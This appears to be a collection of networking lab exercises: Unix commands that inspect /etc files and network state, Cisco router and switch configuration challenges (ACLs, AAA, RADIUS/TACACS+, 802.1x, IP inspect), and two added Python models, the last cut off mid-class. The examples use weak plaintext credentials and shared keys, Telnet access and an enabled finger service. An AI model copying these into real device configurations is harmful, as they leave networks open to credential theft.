1 Enter the ps command, and determine the currently running processes for the user.
2 Enter the ps -al command, to show all the running processes.
List some of the processes.
3 Enter the ps -ef command, for a more complete list of running processes.
List some of the processes.
LISTING KEY NETWORK FILES
Many of the key network configuration files are in the /etc directory.
1 Go to the /etc directory with cd etc.
2 Enter the cat hosts command, and determine its contents.
List some of the contents.
3 Enter the cat passwd command, and determine its contents.
List some of the contents.
4 Enter the cat protocols command, and determine its contents.
List some of the contents.
5 Enter the cat rpc command, and determine its contents.
List some of the contents.
6 Enter the cat services command, and determine its contents.
List some of the contents.
7 Enter the cat aliases command, and determine its contents.
List some of the contents.
8 Enter the cat mnttab command, and determine its contents.
List some of the contents.
9 Enter the cat inetd.conf command, and determine its contents.
List some of the contents.
Showing open connections
As with Microsoft Windows, the netstat command can be used to view the currently open
ports.
1 Enter the netstat command.
List some of the open ports, for both the source and the destination.
/usr/sbin
Many important commands are located in /usr/sbin
1 Go to the /usr/sbin directory with cd /, cd usr, cd sbin.
2 Enter the ls command, and determine its contents.
List some of the contents.
NDS configuration
Novell NDS is used in many large organisation networks, and will often need to be linked
with UNIX.
1 Go to the /etc directory.
2 Enter the cat nds.conf command, and determine its contents.
List some of the contents.
File type display
The file command can be used to determine the type of a file.
1 Go to the /etc directory.
2 Enter the file * command, and determine the listing.
List some of the file types.
Netmasks and networks

The netmasks file can be used to set up the default netmask.
1 Go to the /etc directory with cd /etc.
2 Enter the cat netmasks command, and determine the listing.
3 Enter the cat networks command, and determine the listing.

Netstat
1 Enter the netstat command.
List some of the open ports, for both the source and the destination.
2 Enter the netstat -i command to list information on the interfaces.
List the information given.
3 Enter the netstat -nr command to list the routing table.
List the information given.
4 Enter the netstat -m command to show the buffers.
List the information given.
5 Enter the netstat -s command to show protocol summaries.
List the information given.
DHCP files
DHCP allows nodes to be allocated IP addresses based on their MAC address.
1 Go into the /var folder with cd /var
2 Go into the /var/dhcp folder with cd dhcp
List the files in this folder.
3 Enter the cat dhcptab command, to list the contents of dhcptab
Outline its contents
4 Enter the cat 152_10_6_0 command, to list the contents of 152_10_6_0
Outline its contents

Other supported commands:


cat release
cat printers.conf
cat resolv.conf
cat vfstab

16 CCNP ISCW
Cisco Router Challenge 1
Outline
This challenge involves the configuration of the E0 port on a router.

Objectives
The objectives of this challenge are to:

Set up the IP address on E0 port.
Set up the subnet mask on E0 port.
Enable the E0 port.
Set the description for the E0 port.
Define the speed of the E0 port.
Define duplex on the E0 port.

Example
> enable
# config t
(config)# int e0
(config-if)# ip address 36.109.222.1 255.255.255.128
(config-if)# no shutdown
(config-if)# description testing123
(config-if)# speed 10
(config-if)# duplex half
(config-if)# end

Cisco Router Challenge 17


Outline
This challenge involves the configuration of a standard ACL.

Objectives

The objectives of this challenge are to:

Set up a standard ACL.
Set up an ACL to permit and deny a single host.
Set up an ACL to permit and deny a single network.
Set up an ACL to permit everything else.
Apply it on the incoming port of E0.

Example
> en
# config t
(config)# access-list 2 permit host 130.152.162.10
(config)# access-list 2 deny host 193.68.36.8
(config)# access-list 2 permit 207.182.133.0 0.1.255.255
(config)# access-list 2 deny 153.246.194.0 0.0.127.255
(config)# access-list 2 permit any
(config)# int e0
(config-if)# ip access-group 2 in

Cisco Router Challenge 18


Outline
This challenge involves the configuration of a standard ACL.
Objectives
The objectives of this challenge are to:

Set up a standard ACL.
Set up an ACL to permit and deny a single host.
Set up an ACL to permit and deny a single network.
Set up an ACL to deny everything else.
Apply it on the incoming port of S0.

Example
> en
# config t
(config)# access-list 2 permit host 130.152.162.10
(config)# access-list 2 deny host 193.68.36.8
(config)# access-list 2 permit 207.182.133.0 0.1.255.255
(config)# access-list 2 deny 153.246.194.0 0.0.127.255
(config)# access-list 2 deny any
(config)# int s0
(config-if)# ip access-group 2 in

Cisco Router Challenge 19


Outline
This challenge involves the configuration of an extended ACL.
Objectives
The objectives of this challenge are to:

Define an extended ACL.
Define a host to be allowed.
Define a host to be denied.
Define a network to be allowed.
Define a network to be denied.
Permit everything else.
Apply ACL onto E0.

Example
> en
# config t
(config)# access-list 105 ?
  deny     Specify packets to reject
  dynamic  Specify a DYNAMIC list of PERMITs or DENYs
  permit   Specify packets to forward
  remark   Access list entry comment
(config)# access-list 105 permit ?
  <0-255>  An IP protocol number
  ahp      Authentication Header Protocol
  eigrp    Cisco's EIGRP routing protocol
  esp      Encapsulation Security Payload
  gre      Cisco's GRE tunneling
  icmp     Internet Control Message Protocol
  igmp     Internet Gateway Message Protocol
  igrp     Cisco's IGRP routing protocol
  ip       Any Internet Protocol
  ipinip   IP in IP tunneling
  nos      KA9Q NOS compatible IP over IP tunneling
  ospf     OSPF routing protocol
  pcp      Payload Compression Protocol
  pim      Protocol Independent Multicast
  tcp      Transmission Control Protocol
  udp      User Datagram Protocol
(config)# access-list 105 permit tcp host 208.89.101.4 host 41.153.91.2 eq ftp
(config)# access-list 105 deny tcp host 197.119.92.8 host 144.98.220.6 eq ftp
(config)# access-list 105 permit tcp 100.120.83.0 255.255.255.0 71.252.23.0 255.255.255.0 eq ftp
(config)# access-list 105 deny tcp 35.208.170.0 255.255.255.0 184.124.8.0 255.255.255.0 eq ftp
(config)# access-list 105 ?
  deny     Specify packets to reject
  dynamic  Specify a DYNAMIC list of PERMITs or DENYs
  permit   Specify packets to forward
  remark   Access list entry comment
(config)# access-list 105 permit tcp ?
  A.B.C.D  Source address
  any      Any source host
  host     A single source host
(config)# access-list 105 permit tcp any ?
  A.B.C.D  Destination address
  any      Any destination host
  eq       Match only packets on a given port number
  gt       Match only packets with a greater port number
  host     A single destination host
  lt       Match only packets with a lower port number
  neq      Match only packets not on a given port number
  range    Match only packets in the range of port numbers
(config)# access-list 105 permit tcp any any
(config)# int e0
(config-if)# ip access-group 105 in
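How the router walks these lists can be checked offline with the following Python model, an added example and not NetworkSims code: it evaluates a source address against the entries of Challenges 17 and 18 with the IOS wildcard-mask rule (1 bits are ignored, 0 bits must match), reports which entry fired or that the implicit deny applied, and also shows why a 255.255.255.0 typed where a wildcard belongs, as in the extended entries of Challenge 19, matches only addresses ending in .0 rather than a /24.

```python
"""Standard IP access-list evaluation with wildcard masks (added example, not NetworkSims code).

Walks an access list top to bottom, the way IOS does, matching the source
address against each entry's address/wildcard pair and stopping at the first
hit; a packet that matches no entry is dropped by the implicit deny at the end
of every list. The entries are those of Cisco Router Challenges 17 and 18.
"""
import ipaddress
from typing import List, Optional, Tuple

# Access list 2 from Challenge 17 (permit everything else) ...
ACL_17: List[str] = [
    "permit host 130.152.162.10",
    "deny host 193.68.36.8",
    "permit 207.182.133.0 0.1.255.255",
    "deny 153.246.194.0 0.0.127.255",
    "permit any",
]
# ... and from Challenge 18, identical apart from the final entry.
ACL_18: List[str] = ACL_17[:-1] + ["deny any"]


def to_int(addr: str) -> int:
    return int(ipaddress.IPv4Address(addr))


def to_str(value: int) -> str:
    return str(ipaddress.IPv4Address(value))


def wildcard_match(addr: str, base: str, wildcard: str) -> bool:
    """A wildcard bit of 1 means 'don't care'; a 0 bit must equal the base address."""
    care = 0xFFFFFFFF ^ to_int(wildcard)
    return (to_int(addr) & care) == (to_int(base) & care)


def matched_range(base: str, wildcard: str) -> Tuple[str, str]:
    """Lowest and highest address an entry covers (meaningful for a contiguous wildcard)."""
    care = 0xFFFFFFFF ^ to_int(wildcard)
    low = to_int(base) & care
    return to_str(low), to_str(low | to_int(wildcard))


def parse_entry(line: str) -> Tuple[str, str, str]:
    """'permit host A', 'permit any' or 'permit A WILDCARD' -> (action, base, wildcard)."""
    parts = line.split()
    action = parts[0]
    if action not in ("permit", "deny"):
        raise ValueError(f"bad action in entry: {line!r}")
    if parts[1] == "any":
        return action, "0.0.0.0", "255.255.255.255"
    if parts[1] == "host":
        return action, parts[2], "0.0.0.0"
    return action, parts[1], parts[2]


def evaluate(acl: List[str], src: str) -> Tuple[str, Optional[int]]:
    """Return (decision, index of the matching entry); index None is the implicit deny."""
    for index, line in enumerate(acl):
        action, base, wildcard = parse_entry(line)
        if wildcard_match(src, base, wildcard):
            return action, index
    return "deny", None


if __name__ == "__main__":
    # Constructed sample sources: one per entry of the list.
    for src in ("130.152.162.10", "207.183.9.1", "153.246.200.5", "153.246.100.1"):
        print(src, evaluate(ACL_17, src), evaluate(ACL_18, src))
    for base, wildcard in (("207.182.133.0", "0.1.255.255"), ("153.246.194.0", "0.0.127.255")):
        print(base, wildcard, "covers", matched_range(base, wildcard))
    # A subnet mask typed where a wildcard belongs (as in the extended entries of
    # Challenge 19) is read as "ignore the first three octets, last octet must be 0".
    print("100.120.83.0 255.255.255.0 covers", matched_range("100.120.83.0", "255.255.255.0"))
```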

Cisco Router Challenge 20


Outline
This challenge involves the configuration of named ACLs.
Objectives
The objectives of this challenge are to:

Define a named standard ACL.
Define a named extended ACL.

Example
> en
# config t
(config)# ip access-list ?
  extended    Extended Access List
  log-update  Control access list log updates
  logging     Control access list logging
  standard    Standard Access List
(config)# ip access-list standard ?
  <1-99>  Standard IP access-list number
  WORD    Access-list name
(config)# ip access-list standard leeds
(config-std-nacl)# deny ?
  Hostname or A.B.C.D  Address to match
  any                  Any source host
  host                 A single host address
(config-std-nacl)# deny host 193.34.245.4
(config-std-nacl)# permit host 16.21.50.10
(config-std-nacl)# deny 18.223.156.0 0.15.255.255
(config-std-nacl)# permit 139.32.80.0 0.15.255.255
(config-std-nacl)# exit
(config)# int s0
(config-if)# ip access-group ?
  <1-199>      IP access list (standard or extended)
  <1300-2699>  IP expanded access list (standard or extended)
  WORD         Access-list name
(config-if)# ip access-group leeds in
(config-if)# exit
(config)# ip access-list extended tennessee
(config-ext-nacl)# deny ?
  <0-255>  An IP protocol number
  ahp      Authentication Header Protocol
  eigrp    Cisco's EIGRP routing protocol
  esp      Encapsulation Security Payload
  gre      Cisco's GRE tunneling
  icmp     Internet Control Message Protocol
  igmp     Internet Gateway Message Protocol
  igrp     Cisco's IGRP routing protocol
  ip       Any Internet Protocol
  ipinip   IP in IP tunneling
  nos      KA9Q NOS compatible IP over IP tunneling
  ospf     OSPF routing protocol
  pcp      Payload Compression Protocol
  pim      Protocol Independent Multicast
  tcp      Transmission Control Protocol
  udp      User Datagram Protocol
(config-ext-nacl)# deny tcp host 198.89.74.1 host 208.177.41.6 eq telnet
(config-ext-nacl)# permit tcp host 205.198.245.6 host 202.226.135.3 eq telnet
(config-ext-nacl)# deny tcp 54.83.187.0 255.255.255.0 101.167.107.0 255.255.255.0 eq telnet
(config-ext-nacl)# permit tcp 56.248.48.0 255.255.255.0 138.236.218.0 255.255.255.0 eq telnet
(config-ext-nacl)# exit
(config)# int s1
(config-if)# ip access-group tennessee in

Cisco Switch Challenge 33


Outline
This challenge involves the configuration of a local server for AAA.
Objectives
The objectives of this challenge are to:

Define AAA.
Define the local server.

Example
> enable
# config t
(config)# aaa new-model
(config)# aaa authentication login default local
(config)# username fred password bert
(config)# username fred1 password bert2

Cisco Switch Challenge 34


Outline
This challenge involves the configuration of a RADIUS server for AAA.
Objectives
The objectives of this challenge are to:

Define AAA.
Define the radius server.

Example
> enable
# config t
(config)# aaa new-model
(config)# radius-server ?
  attribute           Customize selected radius attributes
  authorization       Authorization processing information
  challenge-noecho    Data echoing to screen is disabled during Access-Challenge
  configure-nas       Attempt to upload static routes and IP pools at startup
  deadtime            Time to stop using a server that doesn't respond
  directed-request    Allow user to specify radius server to use with `@server'
  domain-stripping    Strip the domain from the username
  host                Specify a RADIUS server
  key                 encryption key shared with the radius servers
  local               Configure local RADIUS server
  optional-passwords  The first RADIUS request can be made without requesting a password
  retransmit          Specify the number of retries to active server
  timeout             Time to wait for a RADIUS server to reply
  unique-ident        Higher order bits of Acct-Session-Id
  vsa                 Vendor specific attribute configuration
(config)# radius-server host 39.100.234.1
(config)# radius-server key ?
  LINE  Text of shared key
(config)# radius-server key krinkle
(config)# aaa ?
  accounting      Accounting configurations parameters.
  authentication  Authentication configurations parameters.
  authorization   Authorization configurations parameters.
  configuration   Authorization configuration parameters.
  nas             NAS specific configuration
  new-model       Enable NEW access control commands and functions.(Disables OLD commands.)
  processes       Configure AAA background processes
(config)# aaa authentication ?
  arap             Set authentication lists for arap.
  banner           Message to use when starting login/authentication.
  enable           Set authentication list for enable.
  fail-message     Message to use for failed login/authentication.
  login            Set authentication lists for logins.
  nasi             Set authentication lists for NASI.
  password-prompt  Text to use when prompting for a password
  ppp              Set authentication lists for ppp.
  username-prompt  Text to use when prompting for a username
(config)# aaa authentication login ?
  WORD     Named authentication list.
  default  The default authentication list.
(config)# aaa authentication login default ?
  enable      Use enable password for authentication.
  group       Use Server-group
  line        Use line password for authentication.
  local       Use local username authentication.
  local-case  Use case-sensitive local username authentication.
  none        NO authentication.
(config)# aaa authentication login default group radius
(config)# aaa authentication ?
  arap             Set authentication lists for arap.
  banner           Message to use when starting login/authentication.
  enable           Set authentication list for enable.
  fail-message     Message to use for failed login/authentication.
  login            Set authentication lists for logins.
  nasi             Set authentication lists for NASI.
  password-prompt  Text to use when prompting for a password
  ppp              Set authentication lists for ppp.
  username-prompt  Text to use when prompting for a username
(config)# aaa authentication ppp ?
  WORD     Named authentication list.
  default  The default authentication list.
(config)# aaa authentication ppp default radius
(config)# aaa authorization ?
  commands         For exec (shell) commands.
  config-commands  For configuration mode commands.
  exec             For starting an exec (shell).
  network          For network services. (PPP, SLIP, ARAP)
  reverse-access   For reverse access connections
(config)# aaa authorization network ?
  WORD     Named authorization list.
  default  The default authorization list.
(config)# aaa authorization network default ?
  enable      Use enable password for authentication.
  group       Use Server-group
  line        Use line password for authentication.
  local       Use local username authentication.
  local-case  Use case-sensitive local username authentication.
(config)# aaa authorization network default group radius
(config)# aaa authorization exec default group radius

Cisco Switch Challenge 35


Outline
This challenge involves the configuration of a Tacacs+ server for AAA.
Objectives
The objectives of this challenge are to:

Define AAA.
Define the Tacacs+ server.

Example
> enable
# config t
(config)# aaa new-model
(config)# tacacs-server host 39.100.234.1
(config)# tacacs-server key krinkle
(config)# aaa authentication login default group tacacs+
(config)# aaa authentication ppp default group tacacs+
(config)# aaa authorization network default group tacacs+
(config)# aaa authorization exec default group tacacs+

Cisco Switch Challenge 36


Outline
This challenge involves the configuration of a Tacacs+ server for commands.
Objectives
The objectives of this challenge are to:

Define AAA.
Define privileges.
Define command authorization for a Tacacs+ server.

Example
> enable
# config t
(config)# aaa new-model
(config)# privilege configure level 7 snmp-server host
(config)# privilege configure level 7 snmp-server enable
(config)# privilege configure level 7 snmp-server
(config)# privilege exec level 7 ping
(config)# privilege exec level 7 configure terminal
(config)# privilege exec level 7 configure
(config)# tacacs-server host 39.100.234.1
(config)# tacacs-server key krinkle
(config)# aaa authorization commands 0 default group tacacs+
(config)# aaa authorization commands 15 default group tacacs+
(config)# aaa authorization commands 7 default group tacacs+

Explanation
The privilege levels go from level 0 to level 15, such as:

Level 0. This only includes five commands: disable, enable, exit, help and logout.
Level 1. This is the non-privileged mode with a prompt of router>.
Level 15. This is the highest level of privilege, and has a prompt of router#.

Typical Level 1 commands are:

access-enable    Create a temporary Access-List entry
clear            Reset functions
connect          Open a terminal connection
disable          Turn off privileged commands
disconnect       Disconnect an existing network connection
enable           Turn on privileged commands
exit             Exit from the EXEC
help             Description of the interactive help system
lock             Lock the terminal
login            Log in as a particular user
logout           Exit from the EXEC
name-connection  Name an existing network connection
ping             Send echo messages
rcommand         Run command on remote switch
resume           Resume an active network connection
show             Show running system information
systat           Display information about terminal lines
telnet           Open a telnet connection
terminal         Set terminal line parameters
traceroute       Trace route to destination
tunnel           Open a tunnel connection
where            List active connections

Thus:
(config)# privilege configure level 7 snmp-server host
(config)# privilege configure level 7 snmp-server enable
(config)# privilege configure level 7 snmp-server
(config)# privilege exec level 7 ping
(config)# privilege exec level 7 configure terminal
(config)# privilege exec level 7 configure

moves these commands to Level 7. For example, ping is a Level 1 command and is now a
Level 7 command, while the rest have moved from Level 15 to Level 7.

Cisco Switch Challenge 37


Outline
This challenge involves the configuration of security of a switch.
Objectives
The objectives of this challenge are to:

Define usernames and passwords.
Define privilege levels.
Restrict access of users to a single host.

Example
> enable
# config t
(config)# username fred password bert
(config)# username test nopassword
(config)# username fred privilege 15
(config)# username test privilege 1
(config)# username test user-maxlinks 2
(config)# access-list 9 permit host 192.168.0.1
(config)# username fred access-class 9

Explanation
The privilege levels go from level 0 to level 15, such as:

Level 0. This only includes five commands: disable, enable, exit, help and logout.
Level 1. This is the non-privileged mode with a prompt of router>.
Level 15. This is the highest level of privilege, and has a prompt of router#.

Typical Level 1 commands are:

access-enable    Create a temporary Access-List entry
clear            Reset functions
connect          Open a terminal connection
disable          Turn off privileged commands
disconnect       Disconnect an existing network connection
enable           Turn on privileged commands
exit             Exit from the EXEC
help             Description of the interactive help system
lock             Lock the terminal
login            Log in as a particular user
logout           Exit from the EXEC
name-connection  Name an existing network connection
ping             Send echo messages
rcommand         Run command on remote switch
resume           Resume an active network connection
show             Show running system information
systat           Display information about terminal lines
telnet           Open a telnet connection
terminal         Set terminal line parameters
traceroute       Trace route to destination
tunnel           Open a tunnel connection
where            List active connections

Thus:
(config)# username fred privilege 15
(config)# username test privilege 1

sets the maximum privilege level for fred at 15, while test will only be able to enter the
non-privileged mode. Also:
(config)# access-list 9 permit host 192.168.0.1
(config)# username fred access-class 9

restricts the access for fred to a single host (192.168.0.1), so that the user will not be able to
log in from any other host. The following:
(config)# username test user-maxlinks 2

restricts the number of connections for test to two.

Cisco Switch Challenge 38


Outline
This challenge involves the configuration of security of a switch.
Objectives
The objectives of this challenge are to:

Define Tacacs+.
Define accounting for start and stop events.

Example
> enable
# config t
(config)# aaa new-model
(config)# aaa account network default start-stop group tacacs+
(config)# aaa account reverse-access default group tacacs+

Cisco Switch Challenge 39


Outline
This challenge involves the configuration of security of a switch based on 802.1x.
Objectives
The objectives of this challenge are to:

Define AAA.
Define port authentication.

Example
> enable
# config t
(config)# aaa new-model
(config)# aaa authentication dot1x default group radius
(config)# int fa0/1
(config-if)# dot1x port-control auto
(config-if)# int fa0/2
(config-if)# dot1x port-control auto
(config-if)# int fa0/4
(config-if)# dot1x port-control auto
(config-if)# exit
(config)# exit
# sh dot1x all
Sysauthcontrol                    = Disabled
Dot1x Protocol Version            = 1
Dot1x Oper Controlled Directions  = Both
Dot1x Admin Controlled Directions = Both
# sh dot1x all
Dot1x Info for interface FastEthernet0/1
----------------------------------------------------
Supplicant MAC <Not Applicable>
AuthSM State      = N/A
BendSM State      = N/A
PortStatus        = N/A
MaxReq            = 2
HostMode          = Single
Port Control      = Auto
QuietPeriod       = 60 Seconds
Re-authentication = Disabled
ReAuthPeriod      = 3600 Seconds
ServerTimeout     = 30 Seconds
SuppTimeout       = 30 Seconds
TxPeriod          = 30 Seconds
Guest-Vlan        = 0
# sh dot1x stat interface fa0/1
PortStatistics Parameters for Dot1x
--------------------------------------------
TxReqId = 0     TxReq = 0      TxTotal = 0
RxStart = 0     RxLogoff = 0   RxRespId = 0   RxResp = 0
RxInvalid = 0   RxLenErr = 0   RxTotal = 0
RxVersion = 0   LastRxSrcMac 0000.0000.0000

Cisco Router Challenge 31


Outline
This challenge involves the configuration of a priority group and route-cache.
Objectives
The objectives of this challenge are to:

Define an access-list.
Define a priority-group.
Define a route-cache.

Example
> en
# config t
(config)# access-list ?
  <1-99>            IP standard access list
  <100-199>         IP extended access list
  <1000-1099>       IPX SAP access list
  <1100-1199>       Extended 48-bit MAC address access list
  <1200-1299>       IPX summary address access list
  <1300-1999>       IP standard access list (expanded range)
  <200-299>         Protocol type-code access list
  <2000-2699>       IP extended access list (expanded range)
  <700-799>         48-bit MAC address access list
  <800-899>         IPX standard access list
  <900-999>         IPX extended access list
  dynamic-extended  Extend the dynamic ACL absolute timer
  rate-limit        Simple rate-limit specific access list
(config)# access-list 105 ?
  deny     Specify packets to reject
  dynamic  Specify a DYNAMIC list of PERMITs or DENYs
  permit   Specify packets to forward
  remark   Access list entry comment
(config)# access-list 105 permit tcp host 144.93.24.10 host 131.33.204.2 eq dns
(config)# access-list 105 deny tcp host 154.31.216.9 host 26.100.164.1 eq dns
(config)# access-list 105 permit tcp 243.76.220.0 255.255.0.0 89.36.160.0 255.255.0.0 eq dns
(config)# access-list 105 deny tcp 102.65.178.0 255.255.0.0 5.101.146.0 255.255.0.0 eq dns
(config)# access-list 105 permit ip ?
  A.B.C.D  Source address
  any      Any source host
  host     A single source host
(config)# access-list 105 permit ip any ?
  A.B.C.D  Destination address
  any      Any destination host
  eq       Match only packets on a given port number
  gt       Match only packets with a greater port number
  host     A single destination host
  lt       Match only packets with a lower port number
  neq      Match only packets not on a given port number
  range    Match only packets in the range of port numbers
(config)# access-list 105 permit ip any any
(config)# int e0
(config-if)# ip access-group 105 in
(config-if)# exit
(config)# priority-list 1 protocol ?
  arp            IP ARP
  bridge         Bridging
  cdp            Cisco Discovery Protocol
  compressedtcp  Compressed TCP
  ip             IP
  ipx            Novell IPX
  llc2           llc2
  pad            PAD links
  snapshot       Snapshot routing support
(config)# priority-list 1 protocol ip ?
  high
  medium
  normal
  low
(config)# priority-list 1 protocol ip high ?
  fragments  Prioritize fragmented IP packets
  gt         Prioritize packets greater than a specified size
  list       To specify an access list
  lt         Prioritize packets less than a specified size
  tcp        Prioritize TCP packets 'to' or 'from' the specified port
  udp        Prioritize UDP packets 'to' or 'from' the specified port
  <cr>
(config)# priority-list 1 protocol ip high list ?
  <1-199>      IP access list
  <1300-2699>  IP expanded access list
(config)# priority-list 1 protocol ip high list 105
(config)# int e0
(config-if)# priority-group ?
  <1-16>  Priority group
(config-if)# priority-group 1
(config-if)# ip route-cache ?
  cef             Enable Cisco Express Forwarding
  flow            Enable Flow fast-switching cache
  policy          Enable fast-switching policy cache for outgoing packets
  same-interface  Enable fast-switching on the same interface
  <cr>
(config-if)# ip route-cache
(config-if)# int e1
(config-if)# ip route-cache

Cisco Router Challenge 33


Outline
This challenge involves the configuration of services on the router.
Objectives
The objectives of this challenge are to:

Define encrypted passwords.
Define timestamps.
Disable TCP small services.
Disable UDP small services.

Example
> en
# config t
(config)# service ?
  compress-config        Compress the configuration file
  config                 TFTP load config files
  dhcp                   Enable DHCP server and relay agent
  disable-ip-fast-frag   Disable IP particle-based fast fragmentation
  exec-callback          Enable exec callback
  exec-wait              Delay EXEC startup on noisy lines
  finger                 Allow responses to finger requests
  hide-telnet-addresses  Hide destination addresses in telnet command
  linenumber             enable line number banner for each exec
  nagle                  Enable Nagle's congestion control algorithm
  old-slip-prompts       Allow old scripts to operate with slip/ppp
  pad                    Enable PAD commands
  password-encryption    Encrypt system passwords
  prompt                 Enable mode specific prompt
  pt-vty-logging         Log significant VTY-Async events
  sequence-numbers       Stamp logger messages with a sequence number
  slave-log              Enable log capability of slave IPs
  tcp-keepalives-in      Generate keepalives on idle incoming network connections
  tcp-keepalives-out     Generate keepalives on idle outgoing network connections
  tcp-small-servers      Enable small TCP servers (e.g., ECHO)
  telnet-zeroidle        Set TCP window 0 when connection is idle
  timestamps             Timestamp debug/log messages
  udp-small-servers      Enable small UDP servers (e.g., ECHO)
(config)# service timestamps ?
  debug  Timestamp debug messages
  log    Timestamp log messages
  <cr>
(config)# service timestamps log ?
  datetime  Timestamp with date and time
  uptime    Timestamp with system uptime
  <cr>
(config)# service timestamps log datetime
(config)# service ?
  compress-config        Compress the configuration file
  config                 TFTP load config files
  dhcp                   Enable DHCP server and relay agent
  disable-ip-fast-frag   Disable IP particle-based fast fragmentation
  exec-callback          Enable exec callback
  exec-wait              Delay EXEC startup on noisy lines
  finger                 Allow responses to finger requests
  hide-telnet-addresses  Hide destination addresses in telnet command
  linenumber             enable line number banner for each exec
  nagle                  Enable Nagle's congestion control algorithm
  old-slip-prompts       Allow old scripts to operate with slip/ppp
  pad                    Enable PAD commands
  password-encryption    Encrypt system passwords
  prompt                 Enable mode specific prompt
  pt-vty-logging         Log significant VTY-Async events
  sequence-numbers       Stamp logger messages with a sequence number
  slave-log              Enable log capability of slave IPs
  tcp-keepalives-in      Generate keepalives on idle incoming network connections
  tcp-keepalives-out     Generate keepalives on idle outgoing network connections
  tcp-small-servers      Enable small TCP servers (e.g., ECHO)
  telnet-zeroidle        Set TCP window 0 when connection is idle
  timestamps             Timestamp debug/log messages
  udp-small-servers      Enable small UDP servers (e.g., ECHO)
(config)# service sequence-numbers
(config)# service dhcp
(config)# service finger
(config)# no service tcp-small-servers
(config)# no service udp-small-servers
(config)# service password-encryption

Cisco Router Challenge 38


Outline
This challenge involves the configuration of AAA.
Objectives
The objectives of this challenge are to:

Define AAA details.

Example
> en
# config t
(config)# aaa new-model
(config)# aaa authen login def radius
(config)# aaa authen ppp def radius
(config)# aaa authen banner new york
(config)# aaa authen fail personal device
(config)# aaa author network default radius
(config)# aaa author exec default radius

Cisco Router Challenge 39


Outline
This challenge involves the configuration of Tacacs+.
Objectives
The objectives of this challenge are to:

Setup of Tacacs+.

Example
> en
# config t
(config)# aaa new-model
(config)# aaa authen login def tacacs+
(config)# aaa authen ppp def tacacs+
(config)# aaa authen banner new york
(config)# aaa authen fail personal device
(config)# aaa author network default tacacs+
(config)# aaa author exec default tacacs+

Cisco Router Challenge 40


Outline
This challenge involves the configuration of restrictions on the local HTTP server.
Objectives
The objectives of this challenge are to:

Set up an ACL to permit a single host.
Apply ACL to restrict access to the HTTP server to only one host.

Example
> en
# config t
(config)# access-list 7 permit host 23.17.220.3
(config)# access-list 7 deny any
(config)# ip http server
(config)# ip http ?
  access-class    Restrict access by access-class
  authentication  Set http authentication method
  path            Set base path for HTML
  port            HTTP port
  server          Enable HTTP server
(config)# ip http access-class ?
  <1-99>  Access list number
(config)# ip http access-class 7

Cisco Router Challenge 41


Outline
This challenge involves the configuration of the HTTP server which denies a single host.
Objectives
The objectives of this challenge are to:

Set up an ACL which denies a single host.
Apply the ACL to deny the host access to the HTTP server.

Example
> en
# config t
(config)# access-list 7 deny host 23.17.220.3
(config)# access-list 7 permit any
(config)# ip http server
(config)# ip http access-class 7

Cisco Router Challenge 42


Outline
This challenge involves the configuration of permitting a single host access to the Telnet
server.
Objectives

The objectives of this challenge are to:

Set up an ACL to allow a single host access.
Apply the ACL to the Telnet server so that only a single host can get access.

Example
> en
# config t
(config)# access-list 1 permit host 202.179.77.6
(config)# access-list 1 deny any
(config)# line vty 0 15
(config-line)# login
(config-line)# access-class ?
  <1-199>      IP access list
  <1300-2699>  IP expanded access list
  WORD         Access-list name
(config-line)# access-class 1 ?
  in   Filter incoming connections
  out  Filter outgoing connections
(config-line)# access-class 1 in

Cisco Router Challenge 43


Outline
This challenge involves the configuration to deny a single host access to the Telnet server.
Objectives
The objectives of this challenge are to:

Set up an ACL to deny a single host access.
Apply the ACL to the Telnet server so that a single host cannot get access.

Example
> en
# config t
(config)# access-list 1 deny host 202.179.77.6
(config)# access-list 1 permit any
(config)# line vty 0 15
(config-line)# login
(config-line)# access-class ?
(config-line)# access-class 1 in

Cisco Router Challenge 44


Outline
This challenge involves the configuration of IP Inspect.
Objectives
The objectives of this challenge are to:

Set up limits for the number of connections over one minute.
Set up limits for the number of open connections.
Define SYN waits.

Example
> en
# config t
(config)# ip inspect ?
  alert-off       Disable alert
  audit-trail     Enable the logging of session information (addresses and bytes)
  dns-timeout     Specify timeout for DNS
  max-incomplete  Specify maximum number of incomplete connections before clamping
  name            Specify an inspection rule
  one-minute      Specify one-minute-sample watermarks for clamping
  tcp             Config timeout values for tcp connections
  udp             Config timeout values for udp flows
  <cr>
(config)# ip inspect one-minute ?
  high  Specify high-watermark for clamping
  low   Specify low-watermark for clamping
(config)# ip inspect one-minute low 360
(config)# ip inspect one-minute high 410
(config)# ip inspect max-incomplete low 720
(config)# ip inspect max-incomplete high 770
(config)# ip inspect dns-timeout 1
(config)# ip inspect tcp ?
  finwait-time    Specify timeout for TCP connections after a FIN
  idle-time       Specify idle timeout for tcp connections
  max-incomplete  Specify max half-open connection per host
  synwait-time    Specify timeout for TCP connections after a SYN and no further data
(config)# ip inspect tcp synwait-time ?
  <1-2147483>  Timeout in seconds
(config)# ip inspect tcp synwait-time 35
(config)# ip inspect tcp finwait-time 5
(config)# ip inspect tcp max-incomplete ?
  host  Specify max half-open connection per host
(config)# ip inspect tcp max-incomplete host 800
(config)# ip inspect tcp ?
  finwait-time    Specify timeout for TCP connections after a FIN
  idle-time       Specify idle timeout for tcp connections
  max-incomplete  Specify max half-open connection per host
  synwait-time    Specify timeout for TCP connections after a SYN and no further data
(config)# ip inspect tcp idle-time 70
(config)# ip inspect udp idle-time 57
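The clamping these watermarks drive can be seen in the following Python model, an added example and not NetworkSims code or IOS source: it tracks half-open TCP sessions with the values from this challenge, expires them at synwait-time, applies the per-host max-incomplete limit, and once the one-minute rate or the half-open count crosses its high watermark deletes the oldest half-open session for each new SYN until both fall below the low watermarks (the class, its names and the exact replacement policy are this example's own simplification).

```python
"""Model of CBAC half-open TCP session clamping (added example, not NetworkSims or IOS code).

Thresholds default to the values set in Cisco Router Challenge 44. Once the
one-minute rate of new attempts or the total half-open count crosses its high
watermark, the tracker deletes the oldest half-open session for every new SYN
until both figures fall back below their low watermarks. The class, names and
the exact replacement policy are this example's own simplification.
"""
from collections import deque
from dataclasses import dataclass
from typing import Deque, Dict, Optional, Tuple

Key = Tuple[str, str, int]  # (source host, destination host, destination port)


@dataclass
class InspectConfig:
    one_minute_low: int = 360           # ip inspect one-minute low 360
    one_minute_high: int = 410          # ip inspect one-minute high 410
    max_incomplete_low: int = 720       # ip inspect max-incomplete low 720
    max_incomplete_high: int = 770      # ip inspect max-incomplete high 770
    tcp_synwait_time: int = 35          # ip inspect tcp synwait-time 35 (seconds)
    tcp_max_incomplete_host: int = 800  # ip inspect tcp max-incomplete host 800


class HalfOpenTracker:
    def __init__(self, cfg: InspectConfig) -> None:
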